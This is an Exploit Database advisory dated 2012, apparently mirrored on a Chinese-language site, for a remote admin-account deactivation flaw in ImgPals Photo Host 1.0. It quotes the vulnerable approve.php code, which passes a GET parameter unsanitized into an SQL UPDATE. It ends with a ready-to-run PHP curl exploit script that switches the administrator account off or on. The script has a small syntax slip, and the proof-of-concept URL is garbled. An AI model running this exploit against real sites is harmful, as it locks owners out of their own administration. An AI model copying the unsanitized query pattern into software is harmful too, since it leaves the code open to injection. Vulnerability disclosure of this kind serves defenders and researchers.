ImgPals Photo Host 1.0 – Admin Account Disactivation

• Exploit Database
• 17 阅读

• 作者： CorryL
  日期： 2012-02-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18544/

• -=[--------------------ADVISORY-------------------]=-
  
  ImgPals Photo Host Version 1.0 STABLE
  
  Author: Corrado Liotta Aka CorryL [corryl80@gmail.com]
  -=[-----------------------------------------------]=-
  
  
  -=[+] Application: ImgPals Photo Host
  -=[+] Version: 1.0 STABLE
  -=[+] Vendor's URL: http://www.imgpals.com/forum/
  -=[+] Platform: Windows\Linux\Unix
  -=[+] Bug type: Admin Account Disactivation
  -=[+] Exploitation: Remote
  -=[-]
  -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
  -=[+] Facebook: https://www.facebook.com/CorryL
  -=[+] Twitter: https://twitter.com/#!/CorradoLiotta
  -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
  
  ...::[ Descriprion ]::..
  
  I released the ImgPals Photo Host Version 1.0 STABLE
  
  
  Features Include:
  
  * Easy Install
  * Full README file included
  * Full Control Panel to control your site
  * User Side Features
  o Multiple JQuery Uploads
  o Create and Edit Photo Albums
  o Make Albums Public or Private
  o Describe Albums and Photos
  o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
  o Add Friends
  o Chat with Friends
  o Update people with status wall posting
  o Manage Profile
  o Profile Avatar Uploads
  o Private Messaging
  * And much more, be sure to check out the Demo
  
  
  ...::[ Bug ]::..
  
  A attaker can remotely disable the account from administratore not
  allowing the same to be able to access the site
  
  ...::[ Proof Of Concept ]::..
  
   if ($_GET['a'] == 'app0'){
   $sqlapprove = mysql_query("UPDATE members SET
  approved = '0' WHERE id = '".$_GET['u']."'");
  
  by sending the command approve.php? u = a = 1 & app0 a attaker can
  disable the Administrator account.
  
  ...::[ Exploit ]::..
  
  #!/usr/bin/php -f
  <?php
  
  
  //Coded by Corrado Liotta For educational purpose only
  //use php exploit.php server app0 or app1
  //use app0 for admin account off
  //use app1 for admin account on
  
  $target = $argv[1];
  $power = $argv[2]
  
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power");
  curl_setopt($ch, CURLOPT_HTTPGET, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
  5.01; Windows NT 5.0)");
  curl_setopt($ch, CURLOPT_TIMEOUT, 3);
  curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
  curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
  curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
  $buf = curl_exec ($ch);
  curl_close($ch);
  unset($ch);
  
  echo $buf;
  ?>